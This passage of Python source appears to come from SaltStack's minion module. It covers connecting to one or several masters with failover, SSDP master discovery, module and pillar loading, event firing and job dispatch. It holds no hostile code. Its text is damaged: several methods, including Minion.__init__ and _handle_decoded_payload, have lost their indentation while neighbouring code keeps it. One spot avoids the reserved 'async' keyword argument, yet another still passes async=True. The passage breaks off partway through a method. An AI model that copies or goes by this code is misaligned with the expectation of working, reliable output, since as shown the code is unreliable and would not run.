        factory_kwargs = {'timeout': timeout, 'safe': safe}
        if getattr(self, 'io_loop', None):
            factory_kwargs['io_loop'] = self.io_loop # pylint: disable=no-member
        tries = opts.get('master_tries', 1)
        attempts = 0
        # if we have a list of masters, loop through them and be
        # happy with the first one that allows us to connect
        if isinstance(opts['master'], list):
            conn = False
            # shuffle the masters and then loop through them
            opts['local_masters'] = copy.copy(opts['master'])
            if opts['random_master']:
                shuffle(opts['local_masters'])
            last_exc = None
            opts['master_uri_list'] = list()
            # This sits outside of the connection loop below because it needs to set
            # up a list of master URIs regardless of which masters are available
            # to connect _to_. This is primarily used for masterless mode, when
            # we need a list of master URIs to fire calls back to.
            for master in opts['local_masters']:
                opts['master'] = master
                opts.update(prep_ip_port(opts))
                opts['master_uri_list'].append(resolve_dns(opts)['master_uri'])
            while True:
                if attempts != 0:
                    # Give up a little time between connection attempts
                    # to allow the IOLoop to run any other scheduled tasks.
                    yield tornado.gen.sleep(opts['acceptance_wait_time'])
                attempts += 1
                if tries > 0:
                    log.debug(
                        'Connecting to master. Attempt %s of %s',
                        attempts, tries
                    )
                else:
                    log.debug(
                        'Connecting to master. Attempt %s (infinite attempts)',
                        attempts
                    )
                for master in opts['local_masters']:
                    opts['master'] = master
                    opts.update(prep_ip_port(opts))
                    opts.update(resolve_dns(opts))
                    # on first run, update self.opts with the whole master list
                    # to enable a minion to re-use old masters if they get fixed
                    if 'master_list' not in opts:
                        opts['master_list'] = copy.copy(opts['local_masters'])
                    self.opts = opts
                    try:
                        pub_channel = salt.transport.client.AsyncPubChannel.factory(opts, **factory_kwargs)
                        yield pub_channel.connect()
                        conn = True
                        break
                    except SaltClientError as exc:
                        last_exc = exc
                        # NOTE(review): message reads "next next" — typo in the
                        # log string (left unchanged here).
                        log.info(
                            'Master %s could not be reached, trying next '
                            'next master (if any)', opts['master']
                        )
                        continue
                if not conn:
                    if attempts == tries:
                        # Exhausted all attempts. Return exception.
                        self.connected = False
                        self.opts['master'] = copy.copy(self.opts['local_masters'])
                        log.error(
                            'No master could be reached or all masters '
                            'denied the minion\'s connection attempt.'
                        )
                        # If the code reaches this point, 'last_exc'
                        # should already be set.
                        raise last_exc # pylint: disable=E0702
                else:
                    self.tok = pub_channel.auth.gen_token(b'salt')
                    self.connected = True
                    raise tornado.gen.Return((opts['master'], pub_channel))
        # single master sign in
        else:
            if opts['random_master']:
                log.warning('random_master is True but there is only one master specified. Ignoring.')
            while True:
                if attempts != 0:
                    # Give up a little time between connection attempts
                    # to allow the IOLoop to run any other scheduled tasks.
                    yield tornado.gen.sleep(opts['acceptance_wait_time'])
                attempts += 1
                if tries > 0:
                    log.debug(
                        'Connecting to master. Attempt %s of %s',
                        attempts, tries
                    )
                else:
                    log.debug(
                        'Connecting to master. Attempt %s (infinite attempts)',
                        attempts
                    )
                opts.update(prep_ip_port(opts))
                opts.update(resolve_dns(opts))
                try:
                    if self.opts['transport'] == 'detect':
                        # try each available transport until one authenticates
                        self.opts['detect_mode'] = True
                        for trans in ('zeromq', 'tcp'):
                            if trans == 'zeromq' and not zmq:
                                continue
                            self.opts['transport'] = trans
                            pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts, **factory_kwargs)
                            yield pub_channel.connect()
                            if not pub_channel.auth.authenticated:
                                continue
                            del self.opts['detect_mode']
                            break
                    else:
                        pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts, **factory_kwargs)
                        yield pub_channel.connect()
                    self.tok = pub_channel.auth.gen_token(b'salt')
                    self.connected = True
                    raise tornado.gen.Return((opts['master'], pub_channel))
                except SaltClientError as exc:
                    if attempts == tries:
                        # Exhausted all attempts. Return exception.
                        self.connected = False
                        raise exc
    def _discover_masters(self):
        '''
        Discover master(s) and decide where to connect, if SSDP is around.
        This modifies the configuration on the fly.
        :return:
        '''
        # only kicks in when the master is still the default and discovery is enabled
        if self.opts['master'] == DEFAULT_MINION_OPTS['master'] and self.opts['discovery'] is not False:
            master_discovery_client = salt.utils.ssdp.SSDPDiscoveryClient()
            masters = {}
            for att in range(self.opts['discovery'].get('attempts', 3)):
                try:
                    att += 1
                    log.info('Attempting {0} time{1} to discover masters'.format(att, (att > 1 and 's' or '')))
                    masters.update(master_discovery_client.discover())
                    if not masters:
                        time.sleep(self.opts['discovery'].get('pause', 5))
                    else:
                        break
                except Exception as err:
                    log.error('SSDP discovery failure: {0}'.format(err))
                    break
            if masters:
                policy = self.opts.get('discovery', {}).get('match', 'any')
                if policy not in ['any', 'all']:
                    log.error('SSDP configuration matcher failure: unknown value "{0}". '
                              'Should be "any" or "all"'.format(policy))
                else:
                    mapping = self.opts['discovery'].get('mapping', {})
                    for addr, mappings in masters.items():
                        for proto_data in mappings:
                            # count how many configured mapping entries this
                            # advertised master satisfies
                            cnt = len([key for key, value in mapping.items()
                                       if proto_data.get('mapping', {}).get(key) == value])
                            if policy == 'any' and bool(cnt) or cnt == len(mapping):
                                self.opts['master'] = proto_data['master']
                                return
    def _return_retry_timer(self):
        '''
        Based on the minion configuration, either return a randomized timer or
        just return the value of the return_retry_timer.
        '''
        msg = 'Minion return retry timer set to {0} seconds'
        # future lint: disable=str-format-in-logging
        if self.opts.get('return_retry_timer_max'):
            try:
                random_retry = randint(self.opts['return_retry_timer'], self.opts['return_retry_timer_max'])
                log.debug(msg.format(random_retry) + ' (randomized)')
                return random_retry
            except ValueError:
                # Catch wiseguys using negative integers here
                log.error(
                    'Invalid value (return_retry_timer: %s or '
                    'return_retry_timer_max: %s). Both must be positive '
                    'integers.',
                    self.opts['return_retry_timer'],
                    self.opts['return_retry_timer_max'],
                )
                log.debug(msg.format(DEFAULT_MINION_OPTS['return_retry_timer']))
                return DEFAULT_MINION_OPTS['return_retry_timer']
        else:
            log.debug(msg.format(self.opts.get('return_retry_timer')))
            return self.opts.get('return_retry_timer')
        # future lint: enable=str-format-in-logging
class SMinion(MinionBase):
    '''
    Create an object that has loaded all of the minion module functions,
    grains, modules, returners etc. The SMinion allows developers to
    generate all of the salt minion functions and present them with these
    functions for general use.
    '''
    def __init__(self, opts):
        # Late setup of the opts grains, so we can log from the grains module
        import salt.loader
        opts['grains'] = salt.loader.grains(opts)
        super(SMinion, self).__init__(opts)
        # Clean out the proc directory (default /var/cache/salt/minion/proc)
        if (self.opts.get('file_client', 'remote') == 'remote'
                or self.opts.get('use_master_when_local', False)):
            # resolve/connect to a master synchronously before loading modules
            install_zmq()
            io_loop = ZMQDefaultLoop.current()
            io_loop.run_sync(
                lambda: self.eval_master(self.opts, failed=True)
            )
        self.gen_modules(initial_load=True)
        # If configured, cache pillar data on the minion
        if self.opts['file_client'] == 'remote' and self.opts.get('minion_pillar_cache', False):
            import salt.utils.yaml
            pdir = os.path.join(self.opts['cachedir'], 'pillar')
            if not os.path.isdir(pdir):
                # pillar cache may hold secrets: directory is owner-only
                os.makedirs(pdir, 0o700)
            ptop = os.path.join(pdir, 'top.sls')
            if self.opts['saltenv'] is not None:
                penv = self.opts['saltenv']
            else:
                penv = 'base'
            cache_top = {penv: {self.opts['id']: ['cache']}}
            with salt.utils.files.fopen(ptop, 'wb') as fp_:
                salt.utils.yaml.safe_dump(cache_top, fp_)
            os.chmod(ptop, 0o600)
            cache_sls = os.path.join(pdir, 'cache.sls')
            with salt.utils.files.fopen(cache_sls, 'wb') as fp_:
                salt.utils.yaml.safe_dump(self.opts['pillar'], fp_)
            os.chmod(cache_sls, 0o600)
    def gen_modules(self, initial_load=False):
        '''
        Tell the minion to reload the execution modules
        CLI Example:
        .. code-block:: bash
            salt '*' sys.reload_modules
        '''
        # recompile pillar first so loaders see fresh pillar data
        self.opts['pillar'] = salt.pillar.get_pillar(
            self.opts,
            self.opts['grains'],
            self.opts['id'],
            self.opts['saltenv'],
            pillarenv=self.opts.get('pillarenv'),
        ).compile_pillar()
        self.utils = salt.loader.utils(self.opts)
        self.functions = salt.loader.minion_mods(self.opts, utils=self.utils)
        self.serializers = salt.loader.serializers(self.opts)
        self.returners = salt.loader.returners(self.opts, self.functions)
        self.proxy = salt.loader.proxy(self.opts, self.functions, self.returners, None)
        # TODO: remove
        self.function_errors = {} # Keep the funcs clean
        self.states = salt.loader.states(self.opts,
                                         self.functions,
                                         self.utils,
                                         self.serializers)
        self.rend = salt.loader.render(self.opts, self.functions)
        self.matcher = Matcher(self.opts, self.functions)
        # expose module reloading to callers of the loaded function set
        self.functions['sys.reload_modules'] = self.gen_modules
        self.executors = salt.loader.executors(self.opts)
class MasterMinion(object):
    '''
    Create a fully loaded minion function object for generic use on the
    master. What makes this class different is that the pillar is
    omitted, otherwise everything else is loaded cleanly.
    '''
    def __init__(
            self,
            opts,
            returners=True,
            states=True,
            rend=True,
            matcher=True,
            whitelist=None,
            ignore_config_errors=True):
        self.opts = salt.config.minion_config(
            opts['conf_file'],
            ignore_config_errors=ignore_config_errors,
            role='master')
        self.opts.update(opts)
        self.whitelist = whitelist
        self.opts['grains'] = salt.loader.grains(opts)
        # The master-side minion never compiles pillar data.
        self.opts['pillar'] = {}
        # Record which optional subsystems gen_modules() should build.
        self.mk_returners = returners
        self.mk_states = states
        self.mk_rend = rend
        self.mk_matcher = matcher
        self.gen_modules(initial_load=True)
    def gen_modules(self, initial_load=False):
        '''
        Tell the minion to reload the execution modules
        CLI Example:
        .. code-block:: bash
            salt '*' sys.reload_modules
        '''
        self.utils = salt.loader.utils(self.opts)
        self.functions = salt.loader.minion_mods(
            self.opts,
            utils=self.utils,
            whitelist=self.whitelist,
            initial_load=initial_load)
        self.serializers = salt.loader.serializers(self.opts)
        if self.mk_returners:
            self.returners = salt.loader.returners(self.opts, self.functions)
        if self.mk_states:
            self.states = salt.loader.states(
                self.opts, self.functions, self.utils, self.serializers)
        if self.mk_rend:
            self.rend = salt.loader.render(self.opts, self.functions)
        if self.mk_matcher:
            self.matcher = Matcher(self.opts, self.functions)
        self.functions['sys.reload_modules'] = self.gen_modules
class MinionManager(MinionBase):
    '''
    Create a multi minion interface, this creates as many minions as are
    defined in the master option and binds each minion object to a respective
    master.
    '''
    def __init__(self, opts):
        super(MinionManager, self).__init__(opts)
        self.auth_wait = self.opts['acceptance_wait_time']
        self.max_auth_wait = self.opts['acceptance_wait_time_max']
        self.minions = []
        self.jid_queue = []
        install_zmq()
        self.io_loop = ZMQDefaultLoop.current()
        self.process_manager = ProcessManager(name='MultiMinionProcessManager')
        # 'async' became a reserved keyword in Python 3.7, so writing it as a
        # literal keyword argument is a SyntaxError there.  Expand it from a
        # dict to stay importable on every supported Python version.
        self.io_loop.spawn_callback(self.process_manager.run, **{'async': True})
    def __del__(self):
        self.destroy()
    def _bind(self):
        # start up the event publisher, so we can see events during startup
        self.event_publisher = salt.utils.event.AsyncEventPublisher(
            self.opts,
            io_loop=self.io_loop,
        )
        self.event = salt.utils.event.get_event('minion', opts=self.opts, io_loop=self.io_loop)
        self.event.subscribe('')
        self.event.set_event_handler(self.handle_event)
    @tornado.gen.coroutine
    def handle_event(self, package):
        # Fan every event out to all managed minions.
        yield [minion.handle_event(package) for minion in self.minions]
    def _create_minion_object(self, opts, timeout, safe,
                              io_loop=None, loaded_base_name=None,
                              jid_queue=None):
        '''
        Helper function to return the correct type of object
        '''
        return Minion(opts,
                      timeout,
                      safe,
                      io_loop=io_loop,
                      loaded_base_name=loaded_base_name,
                      jid_queue=jid_queue)
    def _spawn_minions(self):
        '''
        Spawn all the coroutines which will sign in to masters
        '''
        masters = self.opts['master']
        # failover/distributed configs and single-master configs are handled
        # as a one-element list so the loop below is uniform.
        if (self.opts['master_type'] in ('failover', 'distributed')) or not isinstance(self.opts['master'], list):
            masters = [masters]
        for master in masters:
            # Each minion gets its own private copy of opts bound to one master.
            s_opts = copy.deepcopy(self.opts)
            s_opts['master'] = master
            s_opts['multimaster'] = True
            minion = self._create_minion_object(s_opts,
                                                s_opts['auth_timeout'],
                                                False,
                                                io_loop=self.io_loop,
                                                loaded_base_name='salt.loader.{0}'.format(s_opts['master']),
                                                jid_queue=self.jid_queue,
                                                )
            self.minions.append(minion)
            self.io_loop.spawn_callback(self._connect_minion, minion)
    @tornado.gen.coroutine
    def _connect_minion(self, minion):
        '''
        Create a minion, and asynchronously connect it to a master

        Retries forever on SaltClientError with a back-off that grows by
        ``acceptance_wait_time`` up to ``acceptance_wait_time_max``.
        '''
        last = 0  # never have we signed in
        auth_wait = minion.opts['acceptance_wait_time']
        failed = False
        while True:
            try:
                if minion.opts.get('beacons_before_connect', False):
                    minion.setup_beacons(before_connect=True)
                if minion.opts.get('scheduler_before_connect', False):
                    minion.setup_scheduler(before_connect=True)
                yield minion.connect_master(failed=failed)
                minion.tune_in(start=False)
                break
            except SaltClientError as exc:
                failed = True
                log.error(
                    'Error while bringing up minion for multi-master. Is '
                    'master at %s responding?', minion.opts['master']
                )
                last = time.time()
                if auth_wait < self.max_auth_wait:
                    auth_wait += self.auth_wait
                yield tornado.gen.sleep(auth_wait)  # TODO: log?
            except Exception:
                failed = True
                log.critical(
                    'Unexpected error while connecting to %s',
                    minion.opts['master'], exc_info=True
                )
    # Multi Master Tune In
    def tune_in(self):
        '''
        Bind to the masters
        This loop will attempt to create connections to masters it hasn't connected
        to yet, but once the initial connection is made it is up to ZMQ to do the
        reconnect (don't know of an API to get the state here in salt)
        '''
        self._bind()
        # Fire off all the minion coroutines
        self._spawn_minions()
        # serve forever!
        self.io_loop.start()
    @property
    def restart(self):
        # True when any managed minion has requested a restart.
        for minion in self.minions:
            if minion.restart:
                return True
        return False
    def stop(self, signum):
        # Propagate the signal to every minion's process tree, then destroy.
        for minion in self.minions:
            minion.process_manager.stop_restarting()
            minion.process_manager.send_signal_to_processes(signum)
            # kill any remaining processes
            minion.process_manager.kill_children()
            minion.destroy()
    def destroy(self):
        for minion in self.minions:
            minion.destroy()
class Minion(MinionBase):
'''
This class instantiates a minion, runs connections for a minion,
and loads all of the functions into the minion
'''
def __init__(self, opts, timeout=60, safe=True, loaded_base_name=None, io_loop=None, jid_queue=None): # pylint: disable=W0231
'''
Pass in the options dict
'''
# this means that the parent class doesn't know *which* master we connect to
super(Minion, self).__init__(opts)
self.timeout = timeout
self.safe = safe
self._running = None
self.win_proc = []
self.loaded_base_name = loaded_base_name
self.connected = False
self.restart = False
# Flag meaning minion has finished initialization including first connect to the master.
# True means the Minion is fully functional and ready to handle events.
self.ready = False
self.jid_queue = jid_queue or []
self.periodic_callbacks = {}
if io_loop is None:
install_zmq()
self.io_loop = ZMQDefaultLoop.current()
else:
self.io_loop = io_loop
# Warn if ZMQ < 3.2
if zmq:
if ZMQ_VERSION_INFO < (3, 2):
log.warning(
'You have a version of ZMQ less than ZMQ 3.2! There are '
'known connection keep-alive issues with ZMQ < 3.2 which '
'may result in loss of contact with minions. Please '
'upgrade your ZMQ!'
)
# Late setup of the opts grains, so we can log from the grains
# module. If this is a proxy, however, we need to init the proxymodule
# before we can get the grains. We do this for proxies in the
# post_master_init
if not salt.utils.platform.is_proxy():
self.opts['grains'] = salt.loader.grains(opts)
else:
if self.opts.get('beacons_before_connect', False):
log.warning(
'\'beacons_before_connect\' is not supported '
'for proxy minions. Setting to False'
)
self.opts['beacons_before_connect'] = False
if self.opts.get('scheduler_before_connect', False):
log.warning(
'\'scheduler_before_connect\' is not supported '
'for proxy minions. Setting to False'
)
self.opts['scheduler_before_connect'] = False
log.info('Creating minion process manager')
if self.opts['random_startup_delay']:
sleep_time = random.randint(0, self.opts['random_startup_delay'])
log.info(
'Minion sleeping for %s seconds due to configured '
'startup_delay between 0 and %s seconds',
sleep_time, self.opts['random_startup_delay']
)
time.sleep(sleep_time)
self.process_manager = ProcessManager(name='MinionProcessManager')
self.io_loop.spawn_callback(self.process_manager.run, async=True)
# We don't have the proxy setup yet, so we can't start engines
# Engines need to be able to access __proxy__
if not salt.utils.platform.is_proxy():
self.io_loop.spawn_callback(salt.engines.start_engines, self.opts,
self.process_manager)
# Install the SIGINT/SIGTERM handlers if not done so far
if signal.getsignal(signal.SIGINT) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGINT, self._handle_signals)
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGTERM, self._handle_signals)
    def _handle_signals(self, signum, sigframe):  # pylint: disable=unused-argument
        # SIGINT/SIGTERM handler: stop the run loop, tear down all child
        # processes through the process manager, then exit the interpreter.
        self._running = False
        # escalate the signals to the process manager
        self.process_manager.stop_restarting()
        self.process_manager.send_signal_to_processes(signum)
        # kill any remaining processes
        self.process_manager.kill_children()
        # Give children a moment to die before we terminate ourselves.
        time.sleep(1)
        sys.exit(0)
    def sync_connect_master(self, timeout=None, failed=False):
        '''
        Block until we are connected to a master

        Spins the io_loop until the connect_master() coroutine resolves, or
        until ``timeout`` seconds elapse when given.

        :param timeout: optional seconds after which the io_loop is stopped
        :param failed: forwarded to connect_master() to flag a prior failure
        :raises SaltDaemonNotRunning: when the timeout expires before the
            connection succeeds
        '''
        self._sync_connect_master_success = False
        log.debug("sync_connect_master")
        def on_connect_master_future_done(future):
            # Runs on the io_loop once the connect future resolves; flips the
            # success flag and breaks out of io_loop.start() below.
            self._sync_connect_master_success = True
            self.io_loop.stop()
        self._connect_master_future = self.connect_master(failed=failed)
        # finish connecting to master
        self._connect_master_future.add_done_callback(on_connect_master_future_done)
        if timeout:
            self.io_loop.call_later(timeout, self.io_loop.stop)
        try:
            self.io_loop.start()
        except KeyboardInterrupt:
            self.destroy()
        # I made the following 3 line oddity to preserve traceback.
        # Please read PR #23978 before changing, hopefully avoiding regressions.
        # Good luck, we're all counting on you. Thanks.
        future_exception = self._connect_master_future.exc_info()
        if future_exception:
            # This needs to be re-raised to preserve restart_on_error behavior.
            raise six.reraise(*future_exception)
        if timeout and self._sync_connect_master_success is False:
            raise SaltDaemonNotRunning('Failed to connect to the salt-master')
    @tornado.gen.coroutine
    def connect_master(self, failed=False):
        '''
        Return a future which will complete when you are connected to a master

        Resolves the master to use via eval_master(), keeps the resulting pub
        channel on the instance, then finishes setup in _post_master_init().
        '''
        master, self.pub_channel = yield self.eval_master(self.opts, self.timeout, self.safe, failed)
        yield self._post_master_init(master)
# TODO: better name...
    @tornado.gen.coroutine
    def _post_master_init(self, master):
        '''
        Function to finish init after connecting to a master
        This is primarily loading modules, pillars, etc. (since they need
        to know which master they connected to)
        If this function is changed, please check ProxyMinion._post_master_init
        to see if those changes need to be propagated.
        Minions and ProxyMinions need significantly different post master setups,
        which is why the differences are not factored out into separate helper
        functions.

        :param master: identifier of the master we just connected to
        '''
        if self.connected:
            self.opts['master'] = master
            # Initialize pillar before loader to make pillar accessible in modules
            self.opts['pillar'] = yield salt.pillar.get_async_pillar(
                self.opts,
                self.opts['grains'],
                self.opts['id'],
                self.opts['saltenv'],
                pillarenv=self.opts.get('pillarenv')
            ).compile_pillar()
        if not self.ready:
            # First time through: build functions/schedule/etc.
            self._setup_core()
        elif self.connected and self.opts['pillar']:
            # The pillar has changed due to the connection to the master.
            # Reload the functions so that they can use the new pillar data.
            self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
            if hasattr(self, 'schedule'):
                self.schedule.functions = self.functions
                self.schedule.returners = self.returners
        if not hasattr(self, 'schedule'):
            self.schedule = salt.utils.schedule.Schedule(
                self.opts,
                self.functions,
                self.returners,
                cleanup=[master_event(type='alive')])
        # add default scheduling jobs to the minions scheduler
        if self.opts['mine_enabled'] and 'mine.update' in self.functions:
            self.schedule.add_job({
                '__mine_interval':
                {
                    'function': 'mine.update',
                    'minutes': self.opts['mine_interval'],
                    'jid_include': True,
                    'maxrunning': 2,
                    'return_job': self.opts.get('mine_return_job', False)
                }
            }, persist=True)
            log.info('Added mine.update to scheduler')
        else:
            self.schedule.delete_job('__mine_interval', persist=True)
        # add master_alive job if enabled
        if (self.opts['transport'] != 'tcp' and
                self.opts['master_alive_interval'] > 0 and
                self.connected):
            self.schedule.add_job({
                master_event(type='alive', master=self.opts['master']):
                {
                    'function': 'status.master',
                    'seconds': self.opts['master_alive_interval'],
                    'jid_include': True,
                    'maxrunning': 1,
                    'return_job': False,
                    'kwargs': {'master': self.opts['master'],
                               'connected': True}
                }
            }, persist=True)
            # When failover is on and we are not on the primary master,
            # periodically ping the primary so we can fail back to it.
            if self.opts['master_failback'] and \
                    'master_list' in self.opts and \
                    self.opts['master'] != self.opts['master_list'][0]:
                self.schedule.add_job({
                    master_event(type='failback'):
                    {
                        'function': 'status.ping_master',
                        'seconds': self.opts['master_failback_interval'],
                        'jid_include': True,
                        'maxrunning': 1,
                        'return_job': False,
                        'kwargs': {'master': self.opts['master_list'][0]}
                    }
                }, persist=True)
            else:
                self.schedule.delete_job(master_event(type='failback'), persist=True)
        else:
            self.schedule.delete_job(master_event(type='alive', master=self.opts['master']), persist=True)
            self.schedule.delete_job(master_event(type='failback'), persist=True)
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
mod_opts = {}
for key, val in six.iteritems(self.opts):
if key == 'logger':
continue
mod_opts[key] = val
return mod_opts
    def _load_modules(self, force_refresh=False, notify=False, grains=None):
        '''
        Return the functions and the returners loaded up from the loader
        module

        :param force_refresh: forwarded to the grains loader to force a refresh
        :param notify: forwarded to the module loader
        :param grains: when not None, skip reloading grains entirely
        :return: tuple of (functions, returners, errors, executors)
        '''
        # if this is a *nix system AND modules_max_memory is set, lets enforce
        # a memory limit on module imports
        # this feature ONLY works on *nix like OSs (resource module doesn't work on windows)
        modules_max_memory = False
        if self.opts.get('modules_max_memory', -1) > 0 and HAS_PSUTIL and HAS_RESOURCE:
            log.debug(
                'modules_max_memory set, enforcing a maximum of %s',
                self.opts['modules_max_memory']
            )
            modules_max_memory = True
            old_mem_limit = resource.getrlimit(resource.RLIMIT_AS)
            rss, vms = psutil.Process(os.getpid()).memory_info()[:2]
            # Cap the address space at current usage plus the configured slack.
            mem_limit = rss + vms + self.opts['modules_max_memory']
            resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit))
        elif self.opts.get('modules_max_memory', -1) > 0:
            if not HAS_PSUTIL:
                log.error('Unable to enforce modules_max_memory because psutil is missing')
            if not HAS_RESOURCE:
                log.error('Unable to enforce modules_max_memory because resource is missing')
        # This might be a proxy minion
        if hasattr(self, 'proxy'):
            proxy = self.proxy
        else:
            proxy = None
        if grains is None:
            self.opts['grains'] = salt.loader.grains(self.opts, force_refresh, proxy=proxy)
        self.utils = salt.loader.utils(self.opts, proxy=proxy)
        if self.opts.get('multimaster', False):
            # Give the loader its own copy of opts so state is not shared
            # across multiple master connections.
            s_opts = copy.deepcopy(self.opts)
            functions = salt.loader.minion_mods(s_opts, utils=self.utils, proxy=proxy,
                                                loaded_base_name=self.loaded_base_name, notify=notify)
        else:
            functions = salt.loader.minion_mods(self.opts, utils=self.utils, notify=notify, proxy=proxy)
        returners = salt.loader.returners(self.opts, functions, proxy=proxy)
        errors = {}
        if '_errors' in functions:
            errors = functions['_errors']
            functions.pop('_errors')
        # we're done, reset the limits!
        if modules_max_memory is True:
            resource.setrlimit(resource.RLIMIT_AS, old_mem_limit)
        executors = salt.loader.executors(self.opts, functions, proxy=proxy)
        return functions, returners, errors, executors
    def _send_req_sync(self, load, timeout):
        # Send ``load`` to the master over the blocking req channel and
        # return the reply.  When message signing is enabled, the payload is
        # signed with the minion's private key first.
        if self.opts['minion_sign_messages']:
            log.trace('Signing event to be published onto the bus.')
            minion_privkey_path = os.path.join(self.opts['pki_dir'], 'minion.pem')
            sig = salt.crypt.sign_message(minion_privkey_path, salt.serializers.msgpack.serialize(load))
            load['sig'] = sig
        channel = salt.transport.Channel.factory(self.opts)
        return channel.send(load, timeout=timeout)
    @tornado.gen.coroutine
    def _send_req_async(self, load, timeout):
        # Async counterpart of _send_req_sync(): sign when configured, then
        # send ``load`` to the master over the async req channel.
        if self.opts['minion_sign_messages']:
            log.trace('Signing event to be published onto the bus.')
            minion_privkey_path = os.path.join(self.opts['pki_dir'], 'minion.pem')
            sig = salt.crypt.sign_message(minion_privkey_path, salt.serializers.msgpack.serialize(load))
            load['sig'] = sig
        channel = salt.transport.client.AsyncReqChannel.factory(self.opts)
        ret = yield channel.send(load, timeout=timeout)
        raise tornado.gen.Return(ret)
    def _fire_master(self, data=None, tag=None, events=None, pretag=None, timeout=60, sync=True, timeout_handler=None):
        '''
        Fire an event on the master, or drop message if unable to send.

        :param data: event payload (used together with ``tag``)
        :param tag: event tag (a tag without data sends an empty payload)
        :param events: pre-built list of events; takes precedence over
            data/tag
        :param pretag: tag prefix forwarded to the master
        :param timeout: seconds to wait for the send
        :param sync: send over the blocking channel when True, async when
            False
        :param timeout_handler: callback for async send timeouts (a default
            logger is installed when omitted)
        :return: True on (apparent) success, False on sync failure, None
            when there was nothing to send
        '''
        load = {'id': self.opts['id'],
                'cmd': '_minion_event',
                'pretag': pretag,
                'tok': self.tok}
        if events:
            load['events'] = events
        elif data and tag:
            load['data'] = data
            load['tag'] = tag
        elif not data and tag:
            load['data'] = {}
            load['tag'] = tag
        else:
            # Nothing meaningful to send.
            return
        if sync:
            try:
                self._send_req_sync(load, timeout)
            except salt.exceptions.SaltReqTimeoutError:
                log.info('fire_master failed: master could not be contacted. Request timed out.')
                return False
            except Exception:
                log.info('fire_master failed: %s', traceback.format_exc())
                return False
        else:
            if timeout_handler is None:
                def handle_timeout(*_):
                    log.info('fire_master failed: master could not be contacted. Request timed out.')
                    return True
                timeout_handler = handle_timeout
            with tornado.stack_context.ExceptionStackContext(timeout_handler):
                self._send_req_async(load, timeout, callback=lambda f: None)  # pylint: disable=unexpected-keyword-arg
        return True
@tornado.gen.coroutine
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
# Ensure payload is unicode. Disregard failure to decode binary blobs.
if six.PY2:
data = salt.utils.data.decode(data, keep=True)
if 'user' in data:
log.info(
'User %s Executing command %s with jid %s',
data['user'], data['fun'], data['jid']
)
else:
log.info(
'Executing command %s with jid %s',
data['fun'], data['jid']
)
log.debug('Command details %s', data)
# Don't duplicate jobs
log.trace('Started JIDs: %s', self.jid_queue)
if self.jid_queue is not None:
if data['jid'] in self.jid_queue:
return
else:
self.jid_queue.append(data['jid'])
if len(self.jid_queue) > self.opts['minion_jid_queue_hwm']:
self.jid_queue.pop(0)
if isinstance(data['fun'], six.string_types):
if data['fun'] == 'sys.reload_modules':
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.schedule.functions = self.functions
self.schedule.returners = self.returners
process_count_max = self.opts.get('process_count_max')
if process_count_max > 0:
process_count = len(salt.utils.minion.running(self.opts))
while process_count >= process_count_max:
log.warn("Maximum number of processes reached while executing jid {0}, waiting...".format(data['jid']))
yield tornado.gen.sleep(10)
process_count = len(salt.utils.minion.running(self.opts))
# We stash an instance references to allow for the socket
# communication in Windows. You can't pickle functions, and thus
# python needs to be able to reconstruct the reference on the other
# side.
instance = self
multiprocessing_enabled = self.opts.get('multiprocessing', True)
if multiprocessing_enabled:
if sys.platform.startswith('win'):
# let python reconstruct the minion on the other side if we're
# running on windows
instance = None
with default_signals(signal.SIGINT, signal.SIGTERM):
process = SignalHandlingMultiprocessingProcess(
target=self._target, args=(instance, self.opts, data, self.connected)
)
else:
process = threading.Thread(
target=self._target,
args=(instance, self.opts, data, self.connected),
name=data['jid']
)
if multiprocessing_enabled:
with default_signals(signal.SIGINT, signal.SIGTERM):
# Reset current signals before starting the process in
# order not to inherit the current signal handlers
process.start()
else:
process.start()
# TODO: remove the windows specific check?
if multiprocessing_enabled and not salt.utils.platform.is_windows():
# we only want to join() immediately if we are daemonizing a process
process.join()
else:
self.win_proc.append(process)
def ctx(self):
'''
Return a single context manager for the minion's data
'''
if six.PY2:
return contextlib.nested(
self.functions.context_dict.clone(),
self.returners.context_dict.clone(),
self.executors.context_dict.clone(),
)
else:
exitstack = contextlib.ExitStack()
exitstack.enter_context(self.functions.context_dict.clone())
exitstack.enter_context(self.returners.context_dict.clone())
exitstack.enter_context(self.executors.context_dict.clone())
return exitstack
    @classmethod
    def _target(cls, minion_instance, opts, data, connected):
        # Entry point run inside the freshly spawned job process/thread.
        # ``minion_instance`` is None on Windows multiprocessing (the
        # instance cannot be pickled), in which case a minimal minion is
        # reconstructed here from ``opts``.
        if not minion_instance:
            minion_instance = cls(opts)
            minion_instance.connected = connected
            if not hasattr(minion_instance, 'functions'):
                functions, returners, function_errors, executors = (
                    minion_instance._load_modules(grains=opts['grains'])
                )
                minion_instance.functions = functions
                minion_instance.returners = returners
                minion_instance.function_errors = function_errors
                minion_instance.executors = executors
            if not hasattr(minion_instance, 'serial'):
                minion_instance.serial = salt.payload.Serial(opts)
            if not hasattr(minion_instance, 'proc_dir'):
                uid = salt.utils.user.get_uid(user=opts.get('user', None))
                minion_instance.proc_dir = (
                    get_proc_dir(opts['cachedir'], uid=uid)
                )
        with tornado.stack_context.StackContext(minion_instance.ctx):
            # A list/tuple of function names means a multi-function job.
            if isinstance(data['fun'], tuple) or isinstance(data['fun'], list):
                Minion._thread_multi_return(minion_instance, opts, data)
            else:
                Minion._thread_return(minion_instance, opts, data)
    @classmethod
    def _thread_return(cls, minion_instance, opts, data):
        '''
        This method should be used as a threading target, start the actual
        minion side execution.

        Executes a single function job described by ``data``, then publishes
        the result back to the master and to any configured returners.
        '''
        # Record the job in the proc dir so running jobs can be enumerated.
        fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
        if opts['multiprocessing'] and not salt.utils.platform.is_windows():
            # Shutdown the multiprocessing before daemonizing
            salt.log.setup.shutdown_multiprocessing_logging()
            salt.utils.process.daemonize_if(opts)
            # Reconfigure multiprocessing logging after daemonizing
            salt.log.setup.setup_multiprocessing_logging()
